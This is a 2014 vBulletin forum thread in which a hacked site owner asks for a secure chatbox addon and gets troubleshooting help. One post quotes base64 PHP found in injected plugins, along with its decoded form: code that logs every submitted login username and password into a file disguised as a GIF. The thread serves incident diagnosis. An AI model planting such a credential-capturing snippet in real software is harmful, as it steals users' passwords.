View Full Version : need help with good secure chabox
xpwmaster
09-09-2014, 10:47 AM
i am using now MGC Chatbox Evo 3.4.0 , my site been hacked lately . i am afriad those kind of addons i put might made the hackers easy way in . is there any secure and safe chabox for vb anyone can recomned to me here .
ozzy47
09-09-2014, 10:57 AM
This one, https://vborg.vbsupport.ru/showthread.php?t=236970
blind-eddie
09-09-2014, 11:09 AM
i am using now MGC Chatbox Evo 3.4.0 , my site been hacked lately . i am afriad those kind of addons i put might made the hackers easy way in . is there any secure and safe chabox for vb anyone can recomned to me here .
How do you know it was MGC Chatbox Evo 3.4.0 that allowed hackers to get into your site?
xpwmaster
09-09-2014, 11:38 AM
thanks ozzy . is it real secure? did anyone had problem with it ?
--------------- Added 1410266511 at 1410266511 ---------------
not sure if it was MGC Chatbox Evo 3.4.0 that creat that exploit . but for sure it was vsa statitics addon . so aint sure whice of those scripts are secure
--------------- Added 1410268740 at 1410268740 ---------------
ozzy47
09-09-2014, 12:22 PM
Yes the DBTech one is secure for sure.
How do you know it was the VSA stats mod that has a exploit?
xpwmaster
09-09-2014, 12:22 PM
i am getting error when importing the xml
The requested URL /admin/vbshout.php was not found on this server.
damm
ozzy47
09-09-2014, 12:26 PM
You need to load the files that came with the mod before importing the XML, read the instructions in the read me file in the mods zip.
xpwmaster
09-09-2014, 02:32 PM
ya i intalled . but it isnt good like MGC Chatbox Evo whice has many great options
ozzy47
09-09-2014, 03:08 PM
How do you know it was the VSA stats mod that has a exploit?
What features are missing?
xpwmaster
09-09-2014, 03:50 PM
had gif file when opened with notpad showed all users ad passwords .
BiGFiST> well, they added actual plugins
<FireBirD> were
<FireBirD> whice plug ins they added
<BiGFiST> see under vsa stats
<BiGFiST> two login location products
<BiGFiST> there's base64 php code
<BiGFiST> i decrypted that here http://www.base64decode.org/
<BiGFiST> JHN0ciA9ICIiLiRfUE9TVFsndmJfbG9naW5fdXNlcm5hbWUnXS 4iOiIuJF9QT1NUWyd2Yl9sb2dpbl9wYXNzd29yZCddLiJcclxu IjsgDQokZnAgPSBmb3BlbiAoImltYWdlcy9taXNjL3RyZWVfcn guZ2lmIiwgImErIik7IA0KZndyaXRlICgkZnAsICIkc3RyIik7 IA0KZmNsb3NlICgkZnApOw==
<BiGFiST> that gives
<BiGFiST> $str = "".$_POST['vb_login_username'].":".$_POST['vb_login_password']."\r\n";
<BiGFiST> $fp = fopen ("images/misc/tree_rx.gif", "a+");
<BiGFiST> fwrite ($fp, "$str");
<BiGFiST> fclose ($fp);
ozzy47
09-09-2014, 04:02 PM
But that does noy show it came from the chatbox.
xpwmaster
09-09-2014, 04:14 PM
not sure were i came from . might be vsa stats or maybe chatbox evo . maybe u can check my site in private ozzy ?
Did you check the access.log and error.log of your webserver? It should be fairly easy to find out how they did it by looking at it.
Also, the plugins they added saved all logins in a image file which can be read by opening it in any editor.
xpwmaster
09-09-2014, 04:52 PM
dave or ozzy can u please help me in private . i may give u the ftp info and the admin cp
Feel free to PM me the info of a temporary FTP account, I'll check if there's something in the access.log and/or error.log, in case these files are present.
xpwmaster
09-09-2014, 07:15 PM
i asked my webhost to reset my ftp and control pannel pass . as soon they will reset it il leave u a msg dave . thanks man
--------------- Added 1410295914 at 1410295914 ---------------
--------------- Added 1410296852 at 1410296852 ---------------
i sent u a msg dave
vBulletin® v3.8.12 by vBS, Copyright ©2000-2025, vBulletin Solutions Inc.